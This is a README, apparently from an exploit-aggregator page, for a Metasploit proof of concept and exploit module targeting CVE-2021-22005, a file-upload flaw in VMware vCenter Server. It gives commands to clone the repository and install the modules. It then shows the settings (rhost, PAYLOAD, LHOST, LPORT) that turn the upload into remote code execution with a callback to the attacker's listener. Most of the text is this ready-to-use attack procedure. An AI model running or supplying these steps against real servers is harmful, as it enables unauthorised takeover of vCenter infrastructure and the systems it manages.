## https://sploitus.com/exploit?id=6E42EC2D-B570-5376-884C-7C0566A1CA3D
# CVE-2021-22005-metasploit
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability
# preparation POC
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole
```
# POC usage
```text
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit
```
# result
the script will upload a harmless jsp which include "Could be vuln by CVE-2021-22005" text encoded by base64
# preparation EXP
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole
```
# exploit usage
```text
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit
```
# exploit
# reference
- <https://github.com/5gstudent/CVE-2021-22005->
- <https://github.com/rwincey/CVE-2021-22005>